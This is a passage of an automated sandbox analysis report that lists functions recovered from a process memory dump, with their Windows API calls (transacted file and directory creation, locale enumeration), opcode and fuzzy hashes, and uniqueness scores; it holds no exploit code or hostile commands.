                                                            • Part of subcall function 002A4822: __EH_prolog.LIBCMT ref: 002A4827
                                                            • Part of subcall function 00281A6B: CreateDirectoryTransactedA.KERNEL32(00000000,?,00000000,00000000), ref: 00281A98
                                                            • Part of subcall function 0027F38E: _Deallocate.LIBCONCRT ref: 0027F39D
                                                            • Part of subcall function 0027F171: _Deallocate.LIBCONCRT ref: 0027F186
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: DeallocateH_prolog$CreateDirectoryEnvironmentTransactedVariable
                                                          • String ID:
                                                          • API String ID: 240958575-0
                                                          • Opcode ID: 4c633ee055401d22f1becd00fd6cc6b4d6a1230150637994048b7fe597ad2e32
                                                          • Instruction ID: 36e2ce98f25d14cff714383c40c8954a98cf2b8b6f5a885a6993af6eae82479f
                                                          • Opcode Fuzzy Hash: 4c633ee055401d22f1becd00fd6cc6b4d6a1230150637994048b7fe597ad2e32
                                                          • Instruction Fuzzy Hash: 4532DC30D262AD8BDF14EFA4C9A16EDBBB1BF59300F1481A9D04977282DB701E98CF51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004141D0, Relevance: 2.0, APIs: 1, Instructions: 539COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 004141D5
                                                            • Part of subcall function 00434A6B: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000000), ref: 00434AB7
                                                            • Part of subcall function 004345D2: __EH_prolog.LIBCMT ref: 004345D7
                                                            • Part of subcall function 004345D2: _strcat.LIBCMT ref: 0043462F
                                                            • Part of subcall function 0041181B: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,0000000F,00000000,?,?,00414B2E,00000000,00000000), ref: 0041182F
                                                            • Part of subcall function 0041181B: CreateDirectoryTransactedA.KERNEL32(00000000,?,00000000,00000000), ref: 00411848
                                                            • Part of subcall function 0041181B: CommitTransaction.KTMW32(00000000,?,0000000F,00000000,?,?,00414B2E,00000000,00000000), ref: 00411853
                                                            • Part of subcall function 0040F13E: _Deallocate.LIBCONCRT ref: 0040F14D
                                                            • Part of subcall function 0040EF21: _Deallocate.LIBCONCRT ref: 0040EF36
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: CreateDeallocateH_prologTransaction$CommitDirectoryEnvironmentTransactedVariable_strcat
                                                          • String ID:
                                                          • API String ID: 178285706-0
                                                          • Opcode ID: 850fece0467214763913371bde702e00b766ba21907583b19650dd0ddcd73def
                                                          • Instruction ID: 6b4245292ef644a304bdc1f6faec6aa6f0ddd5d634ec1e5da0ac0b77f7c8501b
                                                          • Opcode Fuzzy Hash: 850fece0467214763913371bde702e00b766ba21907583b19650dd0ddcd73def
                                                          • Instruction Fuzzy Hash: D232CF30D013AC8BDF15DBA5C9516EDBBB1BF95304F1481AEE0497B282DB381E89CB59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00283CD3, Relevance: 2.0, APIs: 1, Instructions: 501COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00283CD8
                                                            • Part of subcall function 0027F38E: _Deallocate.LIBCONCRT ref: 0027F39D
                                                            • Part of subcall function 0027F171: _Deallocate.LIBCONCRT ref: 0027F186
                                                            • Part of subcall function 00281A09: CopyFileTransactedA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000), ref: 00281A45
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: Deallocate$CopyFileH_prologTransacted
                                                          • String ID:
                                                          • API String ID: 381641778-0
                                                          • Opcode ID: 16c790ff4100f9e8fbbe95b6f2415ec5fdebf8edb38693ab3548a4e1f8572c25
                                                          • Instruction ID: 5c109617b4fe6ac30ed1683ac4d3f16551c7d54e14b5345b0bad430b8e69d36d
                                                          • Opcode Fuzzy Hash: 16c790ff4100f9e8fbbe95b6f2415ec5fdebf8edb38693ab3548a4e1f8572c25
                                                          • Instruction Fuzzy Hash: FB22F030D25298CBDF15EBE4C891AEDFBB0AF59300F2081ADE45937282DB741A99CF51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002835E6, Relevance: 2.0, APIs: 1, Instructions: 478COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 002835EB
                                                            • Part of subcall function 00285B8A: _memcmp.LIBVCRUNTIME ref: 00285BAE
                                                            • Part of subcall function 0027F38E: _Deallocate.LIBCONCRT ref: 0027F39D
                                                            • Part of subcall function 0027F171: _Deallocate.LIBCONCRT ref: 0027F186
                                                            • Part of subcall function 00281A09: CopyFileTransactedA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000), ref: 00281A45
                                                            • Part of subcall function 002A4822: __EH_prolog.LIBCMT ref: 002A4827
                                                            • Part of subcall function 00281A6B: CreateDirectoryTransactedA.KERNEL32(00000000,?,00000000,00000000), ref: 00281A98
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: DeallocateH_prologTransacted$CopyCreateDirectoryFile_memcmp
                                                          • String ID:
                                                          • API String ID: 4083962499-0
                                                          • Opcode ID: 07338b1a32b0234fd72ac6a07072d1c221c8847fa7ad4c871584546781b60712
                                                          • Instruction ID: 1f2ab2fad926233bdb0ed2e38dd509f53a9c418e4ccaaa03f9a5366b409c4b9f
                                                          • Opcode Fuzzy Hash: 07338b1a32b0234fd72ac6a07072d1c221c8847fa7ad4c871584546781b60712
                                                          • Instruction Fuzzy Hash: 5A12FF34D29298CBDF15EBA4C8916EDFBB1AF59300F2081ADE44937282DB741A99CF51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0028314A, Relevance: 1.8, APIs: 1, Instructions: 315COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          • Opcode ID: e7a011bdf1d3eefb9c593b331323acda628669edb87f8124a441677e2a56091c
                                                          • Instruction ID: 621377ae7686f9bd40a06a3e3cca695c5b03f1f6880314cd16ff782bb7a2d570
                                                          • Opcode Fuzzy Hash: e7a011bdf1d3eefb9c593b331323acda628669edb87f8124a441677e2a56091c
                                                          • Instruction Fuzzy Hash: F4D1FF30D152A8CBDF15EFA4C991AEDBBB1AF58300F2081A9E44977282DB741B59CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002CCC5D, Relevance: 1.8, APIs: 1, Instructions: 274COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,002CCC58,00000000,?,00000008,?,?,002D5D4B,00000000), ref: 002CCE8A
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ExceptionRaise
                                                          • String ID:
                                                          • API String ID: 3997070919-0
                                                          • Opcode ID: 322506f57487a1255ed18589a2c0414357e06ba1d42f649138dc418e7dbc8a42
                                                          • Instruction ID: c1548a8eb9ba167bba1968c81f2980b0bc9ec2af8b6fa1ff32ad325154a3da74
                                                          • Opcode Fuzzy Hash: 322506f57487a1255ed18589a2c0414357e06ba1d42f649138dc418e7dbc8a42
                                                          • Instruction Fuzzy Hash: 04B139316206059FD714CF28C486F647BA1FF45364F29866DE89ECF2A1C335E9A2CB40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0045CA0D, Relevance: 1.8, APIs: 1, Instructions: 274COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,0045CA08,00000000,?,00000008,?,?,00465AFB,00000000), ref: 0045CC3A
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ExceptionRaise
                                                          • String ID:
                                                          • API String ID: 3997070919-0
                                                          • Opcode ID: 322506f57487a1255ed18589a2c0414357e06ba1d42f649138dc418e7dbc8a42
                                                          • Instruction ID: ccd9f31df86bbb5e2dfa83c63b1e7e46da09ab4e79068a8f9fc7f13ce3eda29a
                                                          • Opcode Fuzzy Hash: 322506f57487a1255ed18589a2c0414357e06ba1d42f649138dc418e7dbc8a42
                                                          • Instruction Fuzzy Hash: 56B15C31610608DFD715CF28C4C6B657BA0FF45366F258659E89ACF3A2C339E986CB48
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002CF67D, Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0ecf10b50864601b8ec81717b9b27189de6ba5197a389ae7cd1bfbf62e8a3d21
                                                          • Instruction ID: e5df74fdd018a22ac81f1b86e97bd6c130d07ff085f536674bdf93c7e6fc4739
                                                          • Opcode Fuzzy Hash: 0ecf10b50864601b8ec81717b9b27189de6ba5197a389ae7cd1bfbf62e8a3d21
                                                          • Instruction Fuzzy Hash: A441CDB5814219AEDB20DF69CC89FAABBB9AF45300F1402EDE41DD3211EA349E948F50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0043433D, Relevance: 1.6, APIs: 1, Instructions: 94comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CoCreateInstance.OLE32(0046C8F0,00000000,00000001,0046C8C0,?), ref: 00434360
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: CreateInstance
                                                          • String ID:
                                                          • API String ID: 542301482-0
                                                          • Opcode ID: 4d9eb55a5a6c316ca25e063ed2abf3a93a77fea459650a7e2386f5acdd7a579c
                                                          • Instruction ID: 5f2b5512c71b95353cd93edf761b0d3401a0e8384d75969e389ecff41c262bad
                                                          • Opcode Fuzzy Hash: 4d9eb55a5a6c316ca25e063ed2abf3a93a77fea459650a7e2386f5acdd7a579c
                                                          • Instruction Fuzzy Hash: 95315271600229AFDB20DB99DC89EDB77BCDF99754F1000A9F418D7251EA74EE00CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002D2647, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 002C6E7B: GetLastError.KERNEL32(?,00000000,?,002B47A1,00000000,00000000,?,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6E80
                                                            • Part of subcall function 002C6E7B: SetLastError.KERNEL32(00000000,004881C8,000000FF,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6F1E
                                                            • Part of subcall function 002C6E7B: _free.LIBCMT ref: 002C6EDD
                                                            • Part of subcall function 002C6E7B: _free.LIBCMT ref: 002C6F13
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002D269B
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorLast_free$InfoLocale
                                                          • String ID:
                                                          • API String ID: 2003897158-0
                                                          • Opcode ID: f7e0d94ec32f56209c64c867c4024eacae391e10f6fe8f83673c7fd8db4f9885
                                                          • Instruction ID: 5a329832e0cbd1dde72ea0595c6459ac9f4f5ab67cb63bc9e7b35a54326d254d
                                                          • Opcode Fuzzy Hash: f7e0d94ec32f56209c64c867c4024eacae391e10f6fe8f83673c7fd8db4f9885
                                                          • Instruction Fuzzy Hash: A421A172620206EBEB289F64DD81E7A73ACEF54310B20007FFD01C6245EA75DD688B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004623F7, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00456C2B: GetLastError.KERNEL32(?,00000000,?,00444551,00000000,00000000,?,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456C30
                                                            • Part of subcall function 00456C2B: SetLastError.KERNEL32(00000000,00000006,000000FF,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456CCE
                                                            • Part of subcall function 00456C2B: _free.LIBCMT ref: 00456C8D
                                                            • Part of subcall function 00456C2B: _free.LIBCMT ref: 00456CC3
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0046244B
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ErrorLast_free$InfoLocale
                                                          • String ID:
                                                          • API String ID: 2003897158-0
                                                          • Opcode ID: f7e0d94ec32f56209c64c867c4024eacae391e10f6fe8f83673c7fd8db4f9885
                                                          • Instruction ID: 2129e4ddc3d0e49f04ea420dac6ab93cedf7c43ce9b957c331d02cff12b4d8ec
                                                          • Opcode Fuzzy Hash: f7e0d94ec32f56209c64c867c4024eacae391e10f6fe8f83673c7fd8db4f9885
                                                          • Instruction Fuzzy Hash: F9219D32600616ABDB28AA25DD41ABB77A8EF44315F10407FFD05D7241EAACAD04865A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0046207E, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00456C2B: GetLastError.KERNEL32(?,00000000,?,00444551,00000000,00000000,?,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456C30
                                                            • Part of subcall function 00456C2B: SetLastError.KERNEL32(00000000,00000006,000000FF,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456CCE
                                                          • EnumSystemLocalesW.KERNEL32(004621A4,00000001,00000000,?,-00000050,?,004627D2,00000000,?,?,?,00000055,?), ref: 004620F0
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                          • String ID:
                                                          • API String ID: 2417226690-0
                                                          • Opcode ID: 31afb89b0c91d192081553ab4253a1547b7d2b784b1f4a38f2868b4945b9d226
                                                          • Instruction ID: a933285b02735f405d032aab85d9e385861b8d7ceb5523e4398ea896a8e15e4e
                                                          • Opcode Fuzzy Hash: 31afb89b0c91d192081553ab4253a1547b7d2b784b1f4a38f2868b4945b9d226
                                                          • Instruction Fuzzy Hash: 01114C37204B056FDB189F39C9915BAB791FF8135CB15442EEA8747740E3B57842C744
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002D2873, Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 002C6E7B: GetLastError.KERNEL32(?,00000000,?,002B47A1,00000000,00000000,?,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6E80
                                                            • Part of subcall function 002C6E7B: SetLastError.KERNEL32(00000000,004881C8,000000FF,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6F1E
                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,002D2610,00000000,00000000,?), ref: 002D289F
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorLast$InfoLocale
                                                          • String ID:
                                                          • API String ID: 3736152602-0
                                                          • Opcode ID: 9650c9cdad8dbe634fd225fbef3400216ed9fc87b4fc03d083028f0258d0baa8
                                                          • Instruction ID: 695f7a6da331a179a3b7ad4325bd01fa2f4abf65f620d234b031e1673d17c844
                                                          • Opcode Fuzzy Hash: 9650c9cdad8dbe634fd225fbef3400216ed9fc87b4fc03d083028f0258d0baa8
                                                          • Instruction Fuzzy Hash: D3F0D632920116EFDB245B208845BBA7768EF50364F04446AEC02E3240EA74ED99D7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00462623, Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00456C2B: GetLastError.KERNEL32(?,00000000,?,00444551,00000000,00000000,?,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456C30
                                                            • Part of subcall function 00456C2B: SetLastError.KERNEL32(00000000,00000006,000000FF,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456CCE
                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004623C0,00000000,00000000,?), ref: 0046264F
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ErrorLast$InfoLocale
                                                          • String ID:
                                                          • API String ID: 3736152602-0
                                                          • Opcode ID: 9650c9cdad8dbe634fd225fbef3400216ed9fc87b4fc03d083028f0258d0baa8
                                                          • Instruction ID: fb12da5fb9f6b1041babb29afea9b3734d0d568d49c5458e5f21595d082e4fcc
                                                          • Opcode Fuzzy Hash: 9650c9cdad8dbe634fd225fbef3400216ed9fc87b4fc03d083028f0258d0baa8
                                                          • Instruction Fuzzy Hash: 28F0F9326005137BDB245B61CE45BBB7758EB40358F06442AED42A3240FABCFD41C7EA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002D2369, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 002C6E7B: GetLastError.KERNEL32(?,00000000,?,002B47A1,00000000,00000000,?,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6E80
                                                            • Part of subcall function 002C6E7B: SetLastError.KERNEL32(00000000,004881C8,000000FF,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6F1E
                                                          • EnumSystemLocalesW.KERNEL32(004623F7,00000001,009A9D6F,?,-00000050,?,002D29E6,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 002D23B3
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                          • String ID:
                                                          • API String ID: 2417226690-0
                                                          • Opcode ID: dac87ea8d4739af8cc496d3d4e81d38c818b646913213b1105a15bbd79143ad8
                                                          • Instruction ID: a23d0e3197c970a0f57365c5d624c639f30becb65e76dcf5a996e05261519a86
                                                          • Opcode Fuzzy Hash: dac87ea8d4739af8cc496d3d4e81d38c818b646913213b1105a15bbd79143ad8
                                                          • Instruction Fuzzy Hash: 2DF046362043059FDB245F38D881A7ABB90EF80368F04446EF9418B780D2B9AC42DA50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00462119, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00456C2B: GetLastError.KERNEL32(?,00000000,?,00444551,00000000,00000000,?,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456C30
                                                            • Part of subcall function 00456C2B: SetLastError.KERNEL32(00000000,00000006,000000FF,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456CCE
                                                          • EnumSystemLocalesW.KERNEL32(004623F7,00000001,?,?,-00000050,?,00462796,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00462163
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                          • String ID:
                                                          • API String ID: 2417226690-0
                                                          • Opcode ID: dac87ea8d4739af8cc496d3d4e81d38c818b646913213b1105a15bbd79143ad8
                                                          • Instruction ID: ddd03b8a212ceae2a9dbe2570196b3ed9107ef6511dcdc07d7f73ed14a6df9cc
                                                          • Opcode Fuzzy Hash: dac87ea8d4739af8cc496d3d4e81d38c818b646913213b1105a15bbd79143ad8
                                                          • Instruction Fuzzy Hash: 49F04C362047042FC7145F359C81ABB7B91EF8135CF05442EFA414B790E2F99C02C648
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002C8227, Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 002C21A5: RtlEnterCriticalSection.NTDLL(-001DDF7B), ref: 002C21B4
                                                          • EnumSystemLocalesW.KERNEL32(00457FCA,00000001,00485918,0000000C,002C86F9,00000000), ref: 002C825F
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                          • String ID:
                                                          • API String ID: 1272433827-0
                                                          • Opcode ID: 0fe7136e486a61c99aeb0810e18f29d6c0c27938a51185649898d52c8878c6d3
                                                          • Instruction ID: 293710ec32cfd570c7f12b9b3b298dd4a0d027f40e63c13d410a48408e6fa8a1
                                                          • Opcode Fuzzy Hash: 0fe7136e486a61c99aeb0810e18f29d6c0c27938a51185649898d52c8878c6d3
                                                          • Instruction Fuzzy Hash: 9FF03776A54600EFE700EF98E842F9C7BF0FB49721F10452AF5109B2A1DBB95904CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002D2283, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 002C6E7B: GetLastError.KERNEL32(?,00000000,?,002B47A1,00000000,00000000,?,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6E80
                                                            • Part of subcall function 002C6E7B: SetLastError.KERNEL32(00000000,004881C8,000000FF,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6F1E
                                                          • EnumSystemLocalesW.KERNEL32(00461F8C,00000001,009A9D6F,?,?,002D2A44,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 002D22BA
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                          • String ID:
                                                          • API String ID: 2417226690-0
                                                          • Opcode ID: f9cd5c2786271873abcf8ac7cd49edb3a13e3dfbc2d206f756e3805f6df5f019
                                                          • Instruction ID: 07ffe8542485ccf190fce1a70fadc4abb6870f00bbeaab218d74fee01f00edf0
                                                          • Opcode Fuzzy Hash: f9cd5c2786271873abcf8ac7cd49edb3a13e3dfbc2d206f756e3805f6df5f019
                                                          • Instruction Fuzzy Hash: 43F0E53A30020597CB14AF75D859BBA7FA4EFC1760B0A409AFE058B291D6759C43CB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00462033, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00456C2B: GetLastError.KERNEL32(?,00000000,?,00444551,00000000,00000000,?,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456C30
                                                            • Part of subcall function 00456C2B: SetLastError.KERNEL32(00000000,00000006,000000FF,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456CCE
                                                          • EnumSystemLocalesW.KERNEL32(00461F8C,00000001,?,?,?,004627F4,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0046206A
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                          • String ID:
                                                          • API String ID: 2417226690-0
                                                          • Opcode ID: f9cd5c2786271873abcf8ac7cd49edb3a13e3dfbc2d206f756e3805f6df5f019
                                                          • Instruction ID: 983ebd83cef928b49e6fffe98f6270672cf09230e1b6a926ab80f3b11bed3a82
                                                          • Opcode Fuzzy Hash: f9cd5c2786271873abcf8ac7cd49edb3a13e3dfbc2d206f756e3805f6df5f019
                                                          • Instruction Fuzzy Hash: ECF05C3A30020457CB04AF35D94577A7F90EFC1714B064059FF058B291D2799843C759
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00458604, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00455BDD,?,20001004,00000000,00000002,?,?,004551C8), ref: 00458638
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID:
                                                          • API String ID: 2299586839-0
                                                          • Opcode ID: b3e8130d8cb80ebcc6fe6bec73e9cb4c6fc47ea098640436f101f52eb0180b2d
                                                          • Instruction ID: 70edc05e529363ee65d264a0e1ecd28dd17c889f09881c2226c81ca015f15853
                                                          • Opcode Fuzzy Hash: b3e8130d8cb80ebcc6fe6bec73e9cb4c6fc47ea098640436f101f52eb0180b2d
                                                          • Instruction Fuzzy Hash: 9CE01231500118B7CB122F51DC04EAE7A56EB44751F048029FC4565261DF758D2596D9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002BD15A, Relevance: 1.5, Strings: 1, Instructions: 239COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0
                                                          • API String ID: 0-4108050209
                                                          • Opcode ID: eec1525cf9fe560ad53541392a7c4d58f1a79ab78856732e92e4228e62cfd8b5
                                                          • Instruction ID: 13f6c0b6a827588159481dc8cea95e070b2e47115ed83135554f22efc845f474
                                                          • Opcode Fuzzy Hash: eec1525cf9fe560ad53541392a7c4d58f1a79ab78856732e92e4228e62cfd8b5
                                                          • Instruction Fuzzy Hash: 7161673063064B56DB389E6C88817FE73A5AB423C4F54042EEC46DB282F7A1DD61DB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002BD3BF, Relevance: 1.5, Strings: 1, Instructions: 239COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0
                                                          • API String ID: 0-4108050209
                                                          • Opcode ID: 498c1002a1bff565f4c8d6ef1a59b9a433b83ae3e524f0507d8d863a910fa1be
                                                          • Instruction ID: 043c996d6151353a72301b322827db1cb9c017ca002891e768ff0b498f3edfb3
                                                          • Opcode Fuzzy Hash: 498c1002a1bff565f4c8d6ef1a59b9a433b83ae3e524f0507d8d863a910fa1be
                                                          • Instruction Fuzzy Hash: FD61593063060656DB389E684895BFE73B5AB423C8F94042EE582EB281F7B1FDB5C715
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002BCF28, Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0
                                                          • API String ID: 0-4108050209
                                                          • Opcode ID: 6110ed094788a03bd00b028201ecb7778e6cc26b3a57c92fee3c47d93b634752
                                                          • Instruction ID: aab7998b75ad9fdc47003a7550d7a109b024eec83f417e4076e3095ac4d8cb38
                                                          • Opcode Fuzzy Hash: 6110ed094788a03bd00b028201ecb7778e6cc26b3a57c92fee3c47d93b634752
                                                          • Instruction Fuzzy Hash: F751C17023060796DF389E3C84957FE679B9B023C4F24086FE446D7A92E691DD76C705
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0044CCD8, Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0
                                                          • API String ID: 0-4108050209
                                                          • Opcode ID: 6110ed094788a03bd00b028201ecb7778e6cc26b3a57c92fee3c47d93b634752
                                                          • Instruction ID: e308963615c54790fb06958cf5d0ef86496eec9844d74f14fc9316283e5e7849
                                                          • Opcode Fuzzy Hash: 6110ed094788a03bd00b028201ecb7778e6cc26b3a57c92fee3c47d93b634752
